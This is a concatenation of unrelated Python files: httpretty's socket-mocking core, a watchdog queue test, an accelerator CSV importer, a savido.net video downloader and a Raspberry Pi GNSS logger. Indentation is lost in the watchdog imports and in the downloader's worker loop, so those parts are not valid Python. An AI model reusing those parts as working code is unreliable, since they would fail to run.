        :param forcing_headers: dict - headers to be forcefully set in the response
        :param status: an integer, defaults to **200**
        :param responses: a list of entries, ideally each created with :py:meth:`~httpretty.core.httpretty.Response`
        :param priority: an integer, useful for setting higher priority over previously registered urls. defaults to zero
        :param match_querystring: bool - whether to take the querystring into account when matching an URL
        :param headers: headers to be added to the response
        .. warning:: When using a port in the request, add a trailing slash if no path is provided otherwise Httpretty will not catch the request. Ex: ``httpretty.register_uri(httpretty.GET, 'http://fakeuri.com:8080/', body='{"hello":"world"}')``
        """
        uri_is_string = isinstance(uri, basestring)

        # "scheme://host.tld" with no path: normalize to a trailing slash
        # so it matches the request line "/"
        if uri_is_string and re.search(r'^\w+://[^/]+[.]\w{2,}$', uri):
            uri += '/'

        if isinstance(responses, list) and len(responses) > 0:
            # explicit response entries: stamp them with this uri/method
            for response in responses:
                response.uri = uri
                response.method = method
            entries_for_this_uri = responses
        else:
            headers[str('body')] = body
            headers[str('adding_headers')] = adding_headers
            headers[str('forcing_headers')] = forcing_headers
            headers[str('status')] = status

            entries_for_this_uri = [
                cls.Response(method=method, uri=uri, **headers),
            ]

        matcher = URIMatcher(uri, entries_for_this_uri,
                             match_querystring, priority)
        if matcher in cls._entries:
            # same uri registered again: merge the old entries into the
            # new matcher and replace the registry slot
            matcher.entries.extend(cls._entries[matcher])
            del cls._entries[matcher]

        cls._entries[matcher] = entries_for_this_uri
    def __str__(self):
        # instance-level repr; counts registered matchers
        return '<HTTPretty with %d URI entries>' % len(self._entries)
    @classmethod
    def Response(
            cls, body,
            method=None,
            uri=None,
            adding_headers=None,
            forcing_headers=None,
            status=200,
            streaming=False,
            **kw):
        """
        shortcut to create an :py:class:`~httpretty.core.Entry` that takes the body as first positional argument
        .. seealso:: the parameters of this function match those of the :py:class:`~httpretty.core.Entry` constructor
        :param body:
        :param method: one of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``
        :param uri:
        :param adding_headers:
        :param forcing_headers:
        :param status: defaults to **200**
        :param streaming: defaults to **False**
        :param kw: keyword-arguments passed onto the :py:class:`~httpretty.core.Entry`
        :returns: an :py:class:`~httpretty.core.Entry`
        """
        kw['body'] = body
        kw['adding_headers'] = adding_headers
        kw['forcing_headers'] = forcing_headers
        kw['status'] = int(status)
        kw['streaming'] = streaming
        return Entry(method, uri, **kw)
    @classmethod
    def disable(cls):
        """Disables HTTPretty entirely, putting the original :py:mod:`socket`
        module back in its place.
        .. code::
            import re, json
            import httpretty
            httpretty.enable()
            # request passes through fake socket
            response = requests.get('https://httpbin.org')
            httpretty.disable()
            # request uses real python socket module
            response = requests.get('https://httpbin.org')
        .. note:: This method does not call :py:meth:`httpretty.core.reset` automatically.
        """
        cls._is_enabled = False
        # restore via both attribute assignment and __dict__ so that
        # modules which captured either view see the original objects
        socket.socket = old_socket
        socket.SocketType = old_SocketType
        socket._socketobject = old_socket

        socket.create_connection = old_create_connection
        socket.gethostname = old_gethostname
        socket.gethostbyname = old_gethostbyname
        socket.getaddrinfo = old_getaddrinfo

        socket.__dict__['socket'] = old_socket
        socket.__dict__['_socketobject'] = old_socket
        socket.__dict__['SocketType'] = old_SocketType

        socket.__dict__['create_connection'] = old_create_connection
        socket.__dict__['gethostname'] = old_gethostname
        socket.__dict__['gethostbyname'] = old_gethostbyname
        socket.__dict__['getaddrinfo'] = old_getaddrinfo

        if socks:
            socks.socksocket = old_socksocket
            socks.__dict__['socksocket'] = old_socksocket

        if ssl:
            ssl.wrap_socket = old_ssl_wrap_socket
            ssl.SSLSocket = old_sslsocket
            try:
                ssl.SSLContext.wrap_socket = old_sslcontext_wrap_socket
            except AttributeError:
                # older ssl modules have no SSLContext.wrap_socket
                pass
            ssl.__dict__['wrap_socket'] = old_ssl_wrap_socket
            ssl.__dict__['SSLSocket'] = old_sslsocket

            if not PY3:
                ssl.sslwrap_simple = old_sslwrap_simple
                ssl.__dict__['sslwrap_simple'] = old_sslwrap_simple

        if requests_urllib3_connection is not None:
            requests_urllib3_connection.ssl_wrap_socket = \
                old_requests_ssl_wrap_socket
            requests_urllib3_connection.__dict__['ssl_wrap_socket'] = \
                old_requests_ssl_wrap_socket
    @classmethod
    def is_enabled(cls):
        """Check if HTTPretty is enabled
        :returns: bool
        .. testcode::
            import httpretty
            httpretty.enable()
            assert httpretty.is_enabled() == True
            httpretty.disable()
            assert httpretty.is_enabled() == False
        """
        return cls._is_enabled
    @classmethod
    def enable(cls, allow_net_connect=True):
        """Enables HTTPretty.
        When ``allow_net_connect`` is ``False`` any connection to an unregistered uri will throw :py:class:`httpretty.errors.UnmockedError`.
        .. testcode::
            import re, json
            import httpretty
            httpretty.enable()
            httpretty.register_uri(
                httpretty.GET,
                re.compile(r'http://.*'),
                body=json.dumps({'man': 'in', 'the': 'middle'})
            )
            response = requests.get('https://foo.bar/foo/bar')
            response.json().should.equal({
                "man": "in",
                "the": "middle",
            })
        .. warning:: after calling this method the original :py:mod:`socket` is replaced with :py:class:`httpretty.core.fakesock`. Make sure to call :py:meth:`~httpretty.disable` after done with your tests or use the :py:class:`httpretty.enabled` as decorator or `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
        """
        cls.allow_net_connect = allow_net_connect
        cls._is_enabled = True
        # Some versions of python internally shadowed the
        # SocketType variable incorrectly https://bugs.python.org/issue20386
        bad_socket_shadow = (socket.socket != socket.SocketType)

        # patch via both attribute assignment and __dict__ so that
        # modules holding either view pick up the fakes
        socket.socket = fakesock.socket
        socket._socketobject = fakesock.socket

        if not bad_socket_shadow:
            socket.SocketType = fakesock.socket

        socket.create_connection = create_fake_connection
        socket.gethostname = fake_gethostname
        socket.gethostbyname = fake_gethostbyname
        socket.getaddrinfo = fake_getaddrinfo

        socket.__dict__['socket'] = fakesock.socket
        socket.__dict__['_socketobject'] = fakesock.socket

        if not bad_socket_shadow:
            socket.__dict__['SocketType'] = fakesock.socket

        socket.__dict__['create_connection'] = create_fake_connection
        socket.__dict__['gethostname'] = fake_gethostname
        socket.__dict__['gethostbyname'] = fake_gethostbyname
        socket.__dict__['getaddrinfo'] = fake_getaddrinfo

        if socks:
            socks.socksocket = fakesock.socket
            socks.__dict__['socksocket'] = fakesock.socket

        if ssl:
            # the fake wrapper keeps a reference to the original so
            # unmocked hostnames still get real TLS
            new_wrap = partial(fake_wrap_socket, old_ssl_wrap_socket)
            ssl.wrap_socket = new_wrap
            ssl.SSLSocket = FakeSSLSocket
            try:
                ssl.SSLContext.wrap_socket = partial(fake_wrap_socket, old_sslcontext_wrap_socket)
            except AttributeError:
                # older ssl modules have no SSLContext.wrap_socket
                pass
            ssl.__dict__['wrap_socket'] = new_wrap
            ssl.__dict__['SSLSocket'] = FakeSSLSocket

            if not PY3:
                ssl.sslwrap_simple = new_wrap
                ssl.__dict__['sslwrap_simple'] = new_wrap

        if requests_urllib3_connection is not None:
            new_wrap = partial(fake_wrap_socket, old_requests_ssl_wrap_socket)
            requests_urllib3_connection.ssl_wrap_socket = new_wrap
            requests_urllib3_connection.__dict__['ssl_wrap_socket'] = new_wrap
class httprettized(object):
    """`context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_ for enabling HTTPretty.
    .. testcode::
        import json
        import httpretty
        httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body=json.dumps({'origin': '42.42.42.42'}))
        with httpretty.enabled():
            response = requests.get('https://httpbin.org/ip')
        assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
        assert response.json() == {'origin': '42.42.42.42'}
    """
    def __init__(self, allow_net_connect=True):
        # whether unregistered urls may hit the real network
        self.allow_net_connect = allow_net_connect

    def __enter__(self):
        # start from a clean registry, then monkeypatch the socket layer
        httpretty.reset()
        httpretty.enable(allow_net_connect=self.allow_net_connect)

    def __exit__(self, exc_type, exc_value, traceback):
        # undo the monkeypatching and clear registered mocks
        httpretty.disable()
        httpretty.reset()
def httprettified(test=None, allow_net_connect=True):
    """decorator for test functions
    .. tip:: Also available under the alias :py:func:`httpretty.activate`
    :param test: a callable
    example usage with `nosetests <https://nose.readthedocs.io/en/latest/>`_
    .. testcode::
        import sure
        from httpretty import httprettified
        @httprettified
        def test_using_nosetests():
            httpretty.register_uri(
                httpretty.GET,
                'https://httpbin.org/ip'
            )
            response = requests.get('https://httpbin.org/ip')
            response.json().should.equal({
                "message": "HTTPretty :)"
            })
    example usage with `unittest module <https://docs.python.org/3/library/unittest.html>`_
    .. testcode::
        import unittest
        from sure import expect
        from httpretty import httprettified
        @httprettified
        class TestWithPyUnit(unittest.TestCase):
            def test_httpbin(self):
                httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip')
                response = requests.get('https://httpbin.org/ip')
                expect(response.json()).to.equal({
                    "message": "HTTPretty :)"
                })
    """
    def decorate_unittest_TestCase_setUp(klass):
        # Prefer addCleanup (added in python 2.7), but fall back
        # to using tearDown if it isn't available
        use_addCleanup = hasattr(klass, 'addCleanup')
        original_setUp = (klass.setUp
                          if hasattr(klass, 'setUp')
                          else None)

        def new_setUp(self):
            httpretty.reset()
            httpretty.enable(allow_net_connect)
            if use_addCleanup:
                self.addCleanup(httpretty.disable)
            if original_setUp:
                original_setUp(self)
        klass.setUp = new_setUp

        if not use_addCleanup:
            # BUG FIX: this previously read ``klass.setUp`` (which had
            # just been replaced with new_setUp above), so the class's
            # original tearDown was never preserved and setUp logic was
            # re-run on teardown instead.
            original_tearDown = (klass.tearDown
                                 if hasattr(klass, 'tearDown')
                                 else None)

            def new_tearDown(self):
                httpretty.disable()
                httpretty.reset()
                if original_tearDown:
                    original_tearDown(self)
            klass.tearDown = new_tearDown

        return klass

    def decorate_test_methods(klass):
        # wrap every test_* method of a non-unittest class individually
        for attr in dir(klass):
            if not attr.startswith('test_'):
                continue

            attr_value = getattr(klass, attr)
            if not hasattr(attr_value, "__call__"):
                continue

            setattr(klass, attr, decorate_callable(attr_value))
        return klass

    def is_unittest_TestCase(klass):
        try:
            import unittest
            return issubclass(klass, unittest.TestCase)
        except ImportError:
            return False

    def decorate_class(klass):
        if is_unittest_TestCase(klass):
            return decorate_unittest_TestCase_setUp(klass)
        return decorate_test_methods(klass)

    def decorate_callable(test):
        @functools.wraps(test)
        def wrapper(*args, **kw):
            with httprettized(allow_net_connect):
                return test(*args, **kw)
        return wrapper

    if isinstance(test, ClassTypes):
        return decorate_class(test)
    elif callable(test):
        return decorate_callable(test)
    return decorate_callable
|
test_watchdog_utils_bricks.py | # -*- coding: utf-8 -*-
import threading
from nose.tools import \
assert_equal, \
assert_true
try:
import queue # IGNORE:F0401
except ImportError:
import Queue as queue # IGNORE:F0401
from watchdog.events import DirModifiedEvent, FileModifiedEvent
from watchdog.utils.bricks import OrderedSetQueue
class TestOrderedSetQueue:
    """Tests for OrderedSetQueue's de-duplicating FIFO behavior."""

    def test_behavior_ordered_set(self):
        """Duplicate events collapse while first-seen order is kept."""
        dir_mod_event = DirModifiedEvent("/path/x")
        file_mod_event = FileModifiedEvent('/path/y')
        event_list = [
            dir_mod_event, dir_mod_event, dir_mod_event, dir_mod_event,
            dir_mod_event,
            file_mod_event, file_mod_event,
            dir_mod_event, dir_mod_event, dir_mod_event, dir_mod_event,
            dir_mod_event,
            file_mod_event, file_mod_event,
            dir_mod_event, dir_mod_event, dir_mod_event, dir_mod_event,
            dir_mod_event,
            file_mod_event, file_mod_event, file_mod_event, file_mod_event,
        ]
        event_set = set(event_list)
        event_queue = OrderedSetQueue()
        for event in event_list:
            event_queue.put(event)

        # BUG FIX: the original ran its assertions inside the consumer
        # thread; an AssertionError raised in a worker thread is swallowed
        # by the threading machinery and never fails the test.  Collect
        # events in the worker and assert in the main thread after join().
        collected = []

        def event_consumer(in_queue):
            while True:
                try:
                    collected.append(in_queue.get(block=True, timeout=0.2))
                    in_queue.task_done()
                except queue.Empty:
                    break

        consumer_thread = threading.Thread(target=event_consumer,
                                           args=(event_queue,))
        consumer_thread.start()
        consumer_thread.join()

        # Check set behavior: no duplicates survived.
        assert_true(len(set(collected)) == len(collected))
        assert_equal(set(collected), event_set)
        # Check order: first-seen order is preserved.
        assert_equal(collected[0], dir_mod_event)
        assert_equal(collected[1], file_mod_event)
|
a_csvimport.py | ############################################################################
# #
# Copyright (c) 2019 Carl Drougge #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
############################################################################
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
description = r'''
CSV file to dataset.
Read a CSV file (can be gziped), with any single iso-8859-1 character
separator (including \0) or no separator at all (always one field per line)
with or without quotes. Any single iso-8859-1 character or both \n and \r\n
(default) as newline. Labels from first line or specified in options.
If allow_bad is set also creates a "bad" dataset containing lineno and data
from bad lines.
If comment or skip_lines is set also creates a "skipped" dataset containing
lineno and data from skipped lines.
If you want lineno for good lines too set lineno_label.
'''
import os
from multiprocessing import Process
from threading import Thread
import struct
import locale
from accelerator.extras import OptionString, DotDict
from accelerator.dataset import DatasetWriter
from accelerator.sourcedata import typed_reader
from accelerator.compat import setproctitle, uni
from accelerator import blob
from accelerator.report import Report
from . import csvimport
depend_extra = (csvimport,)
# Job options for the accelerator framework; every "single character"
# option is an iso-8859-1 character or empty.
options = dict(
    filename = OptionString,
    separator = ',', # Single iso-8859-1 character or empty for a single field.
    comment = '', # Single iso-8859-1 character or empty, lines beginning with this character are ignored.
    newline = '', # Empty means \n or \r\n, or you can specify any single iso-8859-1 character.
    quotes = '', # Empty or False means no quotes, True means both ' and ", any other character means itself.
    labelsonfirstline = True,
    labels = [], # Mandatory if not labelsonfirstline, always sets labels if set.
    rename = {}, # Labels to replace (if they are in the file) (happens first)
    discard = set(), # Labels to not include (if they are in the file)
    lineno_label = "", # Label of column to store line number in (not stored if empty).
    allow_bad = False, # Still succeed if some lines have too few/many fields or bad quotes
    # creates a "bad" dataset containing lineno and data from the bad lines.
    skip_lines = 0, # skip this many lines at the start of the file.
    compression = 6, # gzip level
)
datasets = ('previous', ) # optional previous import to chain from.
cstuff = csvimport.init() # compiled C backend that does the actual parsing.
def reader_status(status_fd, update):
    """Relay progress from the reader process to the status callback.

    Blocks reading 8-byte native-endian uint64 line counters from
    status_fd and pushes a formatted status string for each, until the
    write end of the pipe is closed (EOF).
    """
    # try to get nicer number formating
    try:
        locale.resetlocale(locale.LC_NUMERIC)
    except Exception:
        pass
    count = 0
    while True:
        update('{0:n} lines read'.format(count))
        data = os.read(status_fd, 8)
        if not data:
            break  # writer closed the pipe; the reader process is done.
        count = struct.unpack("=Q", data)[0]
def reader_process(slices, filename, write_fds, labels_fd, success_fd, status_fd, comment_char, lf_char):
    """Child-process entry point: run the C reader over the input file.

    Splits the file across `slices` pipes (write_fds), optionally writes
    the label line to labels_fd, streams progress to status_fd, and
    reports the result as a single byte on success_fd (b"\\0" = success,
    as checked by synthesis()).
    """
    # Terrible hack - try to close FDs we didn't want in this process.
    # (This is important, if the main process dies this won't be
    # detected if we still have these open.)
    keep_fds = set(write_fds)
    keep_fds.add(labels_fd)
    keep_fds.add(success_fd)
    keep_fds.add(status_fd)
    # a few extra to be safe.
    for fd in range(3, max(keep_fds) + 32):
        if fd not in keep_fds:
            try:
                os.close(fd)
            except OSError:
                pass
    setproctitle("reader")
    res = cstuff.backend.reader(filename.encode("ascii"), slices, options.skip_lines, write_fds, labels_fd, status_fd, comment_char, lf_char)
    # A truthy res marks failure: synthesis() only accepts b"\0".
    os.write(success_fd, b"\x01" if res else b"\0")
    os.close(success_fd)
def char2int(name, empty_value, specials="empty"):
    """Convert single-character option `name` to its iso-8859-1 byte value.

    Returns `empty_value` when the option is unset/empty; raises when the
    value is not exactly one iso-8859-1 character.
    """
    char = options.get(name)
    if not char:
        return empty_value
    msg = "%s must be a single iso-8859-1 character (or %s)" % (name, specials,)
    if isinstance(char, bytes):
        char = uni(char)
    try:
        char = char.encode("iso-8859-1")
    except UnicodeEncodeError:
        raise Exception(msg)
    assert len(char) == 1, msg
    return cstuff.backend.char2int(char)
def prepare(job, slices):
    """Create pipes, start the reader process and set up dataset writers.

    Returns the tuple consumed by analysis()/synthesis(): parsing
    parameters, labels, writers, per-slice read FDs and the reader's
    success/status FDs.
    """
    # use 256 as a marker value, because that's not a possible char value (assuming 8 bit chars)
    lf_char = char2int("newline", 256)
    # separator uses lf_char or \n as the empty value, because memchr might mishandle 256.
    separator = char2int("separator", 10 if lf_char == 256 else lf_char)
    comment_char = char2int("comment", 256)
    # quote_char: 256 = both ' and ", 257 = quoting disabled, else the char itself.
    if options.quotes == 'True':
        quote_char = 256
    elif options.quotes == 'False':
        quote_char = 257
    else:
        quote_char = char2int("quotes", 257, "True/False/empty")
    filename = os.path.join(job.source_directory, options.filename)
    orig_filename = filename
    assert 1 <= options.compression <= 9
    # One pipe per slice: the reader process writes, analysis() reads.
    fds = [os.pipe() for _ in range(slices)]
    read_fds = [t[0] for t in fds]
    write_fds = [t[1] for t in fds]
    if options.labelsonfirstline:
        labels_rfd, labels_wfd = os.pipe()
    else:
        labels_wfd = -1
    success_rfd, success_wfd = os.pipe()
    status_rfd, status_wfd = os.pipe()
    p = Process(target=reader_process, name="reader", args=(slices, filename, write_fds, labels_wfd, success_wfd, status_wfd, comment_char, lf_char))
    p.start()
    # Close our copies of the write ends so EOF propagates from the child.
    for fd in write_fds:
        os.close(fd)
    os.close(success_wfd)
    os.close(status_wfd)
    if options.labelsonfirstline:
        os.close(labels_wfd)
        # re-use import logic
        out_fns = ["labels"]
        r_num = cstuff.mk_uint64(3)
        res = cstuff.backend.import_slice(*cstuff.bytesargs(labels_rfd, -1, -1, -1, out_fns, b"wb1", separator, r_num, quote_char, lf_char, 0))
        os.close(labels_rfd)
        assert res == 0, "c backend failed in label parsing"
        with typed_reader("bytes")("labels") as fh:
            labels_from_file = [lab.decode("utf-8", "backslashreplace") for lab in fh]
        os.unlink("labels")
    else:
        labels_from_file = None
    # Explicit labels override those read from the file.
    labels = options.labels or labels_from_file
    assert labels, "No labels"
    labels = [options.rename.get(x, x) for x in labels]
    assert '' not in labels, "Empty label for column %d" % (labels.index(''),)
    assert len(labels) == len(set(labels)), "Duplicate labels: %r" % (labels,)
    dw = DatasetWriter(
        columns={n: 'bytes' for n in labels if n not in options.discard},
        filename=orig_filename,
        caption='csvimport of ' + orig_filename,
        previous=datasets.previous,
        meta_only=True,
    )
    if options.lineno_label:
        dw.add(options.lineno_label, "int64")
    if options.allow_bad:
        bad_dw = DatasetWriter(
            name="bad",
            columns=dict(lineno="int64", data="bytes"),
            caption='bad lines from csvimport of ' + orig_filename,
            meta_only=True,
        )
    else:
        bad_dw = None
    if options.comment or options.skip_lines:
        skipped_dw = DatasetWriter(
            name="skipped",
            columns=dict(lineno="int64", data="bytes"),
            caption='skipped lines from csvimport of ' + orig_filename,
            meta_only=True,
        )
    else:
        skipped_dw = None
    return separator, quote_char, lf_char, filename, orig_filename, labels, dw, bad_dw, skipped_dw, read_fds, success_rfd, status_rfd,
def analysis(sliceno, slices, prepare_res, update_top_status):
    """Per-slice worker: run the C import over this slice's pipe.

    Returns [good_count, bad_count, skipped_count] for this slice.
    """
    separator, quote_char, lf_char, filename, _, labels, dw, bad_dw, skipped_dw, fds, _, status_fd, = prepare_res
    # Only slice 0 relays reader progress; all others close their copy.
    if sliceno == 0:
        t = Thread(
            target=reader_status,
            args=(status_fd, update_top_status),
            name='reader status',
        )
        t.daemon = True
        t.start()
    else:
        os.close(status_fd)
    # Close the FDs for all other slices.
    # Not techically necessary, but it feels like a good idea.
    for ix, fd in enumerate(fds):
        if ix != sliceno:
            os.close(fd)
    # Output filenames in the order the C backend expects; cstuff.NULL
    # marks outputs that should be discarded.
    out_fns = []
    for label in labels:
        if label in options.discard:
            out_fns.append(cstuff.NULL)
        else:
            out_fns.append(dw.column_filename(label))
    for extra_dw in (bad_dw, skipped_dw):
        if extra_dw:
            for n in ("lineno", "data"):
                out_fns.append(extra_dw.column_filename(n))
        else:
            out_fns.append(cstuff.NULL)
            out_fns.append(cstuff.NULL)
    if options.lineno_label:
        out_fns.append(dw.column_filename(options.lineno_label))
    else:
        out_fns.append(cstuff.NULL)
    r_num = cstuff.mk_uint64(3)  # [good_count, bad_count, skipped_count]
    gzip_mode = b"wb%d" % (options.compression,)
    res = cstuff.backend.import_slice(*cstuff.bytesargs(fds[sliceno], sliceno, slices, len(labels), out_fns, gzip_mode, separator, r_num, quote_char, lf_char, options.allow_bad))
    assert res == 0, "c backend failed in slice %d" % (sliceno,)
    os.close(fds[sliceno])
    return list(r_num)
def synthesis(prepare_res, analysis_res):
    """Verify the reader process succeeded and record per-slice counts."""
    separator, _, _, filename, _, labels, dw, bad_dw, skipped_dw, fds, success_fd, _, = prepare_res
    # Analysis may have gotten a perfectly legitimate EOF if something
    # went wrong in the reader process, so we need to check that all
    # went well.
    try:
        reader_res = os.read(success_fd, 1)
    except OSError:
        reader_res = None
    # reader_process writes b"\0" on success, b"\x01" on failure.
    if reader_res != b"\0":
        raise Exception("Reader process failed")
    good_counts = []
    bad_counts = []
    skipped_counts = []
    for sliceno, (good_count, bad_count, skipped_count) in enumerate(analysis_res):
        dw.set_lines(sliceno, good_count)
        if bad_dw:
            bad_dw.set_lines(sliceno, bad_count)
        if skipped_dw:
            skipped_dw.set_lines(sliceno, skipped_count)
        good_counts.append(good_count)
        bad_counts.append(bad_count)
        skipped_counts.append(skipped_count)
    res = DotDict(
        num_lines=sum(good_counts),
        lines_per_slice=good_counts,
        num_broken_lines=sum(bad_counts),
        broken_lines_per_slice=bad_counts,
        num_skipped_lines=sum(skipped_counts),
        skipped_lines_per_slice=skipped_counts,
    )
    blob.save(res, 'import')
    write_report(res, labels)
def write_report(res, labels):
    """Write a human-readable per-slice line-count table to the report."""
    with Report() as r:
        # `or 1` avoids division by zero for completely empty inputs.
        divider = (res.num_lines + res.num_broken_lines + res.num_skipped_lines) or 1
        r.println("Number of rows read\n")
        r.write(" slice lines")
        if res.num_broken_lines:
            r.write(" broken")
        if res.num_skipped_lines:
            r.write(" skipped")
        r.write("\n")
        for sliceno, (good_cnt, bad_cnt, skipped_cnt) in enumerate(zip(res.lines_per_slice, res.broken_lines_per_slice, res.skipped_lines_per_slice)):
            r.write(" %5d %9d (%6.2f%%)" % (sliceno, good_cnt, 100 * good_cnt / divider,))
            # Broken/skipped columns only appear when non-zero overall.
            if res.num_broken_lines:
                r.write(" %9d (%6.2f%%)" % (bad_cnt, 100 * bad_cnt / divider,))
            if res.num_skipped_lines:
                r.write(" %9d (%6.2f%%)" % (skipped_cnt, 100 * skipped_cnt / divider,))
            r.write("\n")
        r.write(" total %9d" % (res.num_lines,))
        if res.num_broken_lines or res.num_skipped_lines:
            r.write(" (%6.2f%%)" % (100 * res.num_lines / divider,))
        if res.num_broken_lines:
            r.write(" %9d (%6.2f%%)" % (res.num_broken_lines, 100 * res.num_broken_lines / divider,))
        if res.num_skipped_lines:
            r.write(" %9d (%6.2f%%)" % (res.num_skipped_lines, 100 * res.num_skipped_lines / divider,))
        r.write("\n")
        r.line()
        r.println('Number of columns %5d' % len(labels,))
|
downloader.py | #!/usr/bin/env python2
import sys
import urllib2
import urllib
from bs4 import BeautifulSoup
import traceback
import dao
from threading import Thread
def download(vUrl, out):
    # Resolve the real video URL via savido.net, then fetch it to <out>.mp4.
    page = urllib2.urlopen("http://www.savido.net/download?url=" + vUrl).read()
    soup = BeautifulSoup(page, "lxml")
    # The first <td><a> on the page carries the direct download link.
    link = soup.select("td > a")[0].get("href")
    urllib.urlretrieve(link, "%s.mp4" % out)
def downloadVids():
while True:
try:
video = dao.getToDownload()
url = video["url"]
print "Dowloading " + url
outfile = "%s/%s" % (sys.argv[1], video["id"])
download(url, outfile)
dao.addUrl(video["urlid"], url, 4 if video["status"] == 3 else 5)
print "--Downloaded " + url
except Exception, e:
print >> sys.stderr, "DL " + type(e).__name__ + " " + str(e) + " " + url
traceback.print_exc()
if __name__ == "__main__":
    threads = []
    downloadThreads = 1
    try:
        downloadThreads = int(sys.argv[2])
    except IndexError:
        pass
    for i in range(0, downloadThreads):
        t = Thread(target=downloadVids)
        t.setDaemon(True)
        t.start()
        threads.append(t)
    # BUG FIX: the original spun in a tight poll over isAlive(), burning a
    # full CPU core.  join() with a timeout blocks instead of spinning,
    # while still letting KeyboardInterrupt through between joins.
    for t in threads:
        while t.isAlive():
            t.join(1.0)
|
app.py | #!/usr/bin/python
import RPi.GPIO as GPIO
from serial import Serial
import time
import threading
import os
import sys
# BUTTON
BUTTON_GPIO_PIN = 4
SHORT_PRESS_TICKS = 5
LONG_PRESS_TICKS = 200
TICK_TIME = 0.01
DOWN = 0
# LED
LED_GPIO_PIN = 18
SLOW_FLASH_TIMES = [1,1]
FAST_FLASH_TIMES = [0.2,0.2]
# Global Navigation Satellite System (GNSS): GPS, GLONASS, Galileo, ...
BAUDRATE = 9600
PORT = '/dev/ttyAMA0'
class ButtonControl(threading.Thread):
    """Polls a GPIO push button and classifies presses as short or long."""

    class ButtonPressStates():
        NOTPRESSED = 0
        SHORTPRESS = 1
        LONGPRESS = 2

    def __init__(self, gpio_pin):
        threading.Thread.__init__(self)
        self.gpio_pin = gpio_pin
        # BUG FIX: initialize the run flag here so stopController() cannot
        # raise AttributeError when called before run() has started.
        self.__running = False
        self.__current_state = self.ButtonPressStates.NOTPRESSED
        self.shortPressTicks = SHORT_PRESS_TICKS
        self.longPressTicks = LONG_PRESS_TICKS
        self.tickTime = TICK_TIME
        GPIO.setup(self.gpio_pin, GPIO.IN)

    def get(self):
        # Raw GPIO level (DOWN == 0 means pressed).
        return GPIO.input(self.gpio_pin)

    def is_pressed(self):
        return GPIO.input(self.gpio_pin) == DOWN

    def run(self):
        self.__running = True
        self.__current_state = self.ButtonPressStates.NOTPRESSED
        # Wait out any press already in progress at startup.
        while self.is_pressed():
            time.sleep(self.tickTime)
        while self.__running:
            # Wait for the button to go down.
            while self.is_pressed() == False and self.__running:
                time.sleep(self.tickTime)
            # Count ticks until release; tick count classifies the press.
            ticks = 0
            while self.is_pressed() == True and self.__running:
                ticks += 1
                time.sleep(self.tickTime)
            if ticks > self.shortPressTicks and ticks < self.longPressTicks:
                self.__current_state = self.ButtonPressStates.SHORTPRESS
            if ticks >= self.longPressTicks:
                self.__current_state = self.ButtonPressStates.LONGPRESS
            # Debounce / give the consumer time to read the state.
            time.sleep(0.5)

    def get_state(self):
        return self.__current_state

    def set_not_pressed(self):
        # Consumer acknowledges the press by resetting the state.
        self.__current_state = self.ButtonPressStates.NOTPRESSED

    def stopController(self):
        self.__running = False
class GnssControl(threading.Thread):
    """Reads NMEA sentences from the serial GNSS module and logs them.

    While the state is RECORD, '$GP' sentences are appended to a
    timestamped .nmea file; PAUSE keeps reading without writing.
    """

    class GnssStates():
        STOP = 0
        PAUSE = 1
        RECORD = 2

    def __init__(self):
        threading.Thread.__init__(self)
        self.__running = False
        self.__current_state = self.GnssStates.STOP
        self.serialGnss = Serial()
        self.serialGnss.baudrate = BAUDRATE
        self.serialGnss.port = PORT
        self.serialGnss.timeout = 4  # secs; readline() returns on timeout
        self.serialGnss.open()
        self.fileDescriptor = open('/home/pi/track-%s.nmea' %time.strftime('%Y%m%d%H%M%S'), 'a')

    def set_stopped(self):
        # NOTE(review): closing the file here can race with a write in
        # run() if a sentence is mid-handling; the stop flag is cleared
        # first to shrink the window — confirm this is acceptable.
        self.__current_state = self.GnssStates.STOP
        self.__running = False
        self.fileDescriptor.close()

    def set_paused(self):
        self.__current_state = self.GnssStates.PAUSE

    def run(self):
        self.__running = True
        while self.__running:
            sentence = self.serialGnss.readline()
            sentenceStr = str(sentence)
            if self.__current_state == self.GnssStates.RECORD:
                # BUG FIX: was `find('$GP') > 0`, which silently skipped
                # sentences where '$GP' sits at index 0 — the normal
                # position for an NMEA sentence.
                if sentence.find('$GP') != -1:
                    self.fileDescriptor.write('{0:}'.format(sentenceStr))

    def set_recording(self):
        self.__current_state = self.GnssStates.RECORD

    def get_state(self):
        return self.__current_state
class LedControl():
    """Drives a status LED: steady on/off, or flashing via a worker thread."""

    class LedStates():
        OFF = 0
        ON = 1
        SLOW_FLASH = 2
        FAST_FLASH = 3

    def __init__(self, gpio_pin):
        self.__current_state = self.LedStates.OFF
        self.__current_led_state = False  # physical LED level
        self.gpio_pin = gpio_pin
        GPIO.setup(self.gpio_pin, GPIO.OUT)
        self.__set_off()

    def __set_off(self):
        self.__current_led_state = False
        GPIO.output(self.gpio_pin, False)

    def __set_on(self):
        self.__current_led_state = True
        GPIO.output(self.gpio_pin, True)

    def __flash(self, time_on, time_off):
        # Toggle the LED until the logical state leaves the flashing modes.
        flashing = (self.LedStates.SLOW_FLASH, self.LedStates.FAST_FLASH)
        while self.get_state() in flashing:
            if self.__current_led_state:
                self.__set_off()
                time.sleep(time_off)
            else:
                self.__set_on()
                time.sleep(time_on)

    def __start_flashing(self, times):
        # Helper: remember the timing pair and launch the flash thread.
        self.__time_on, self.__time_off = times
        self.__flashthread = threading.Thread(
            target=self.__flash, args=(self.__time_on, self.__time_off))
        self.__flashthread.start()

    def set_on(self):
        self.__current_state = self.LedStates.ON
        self.__set_on()

    def set_off(self):
        self.__current_state = self.LedStates.OFF
        self.__set_off()

    def set_slow_flash(self):
        self.__current_state = self.LedStates.SLOW_FLASH
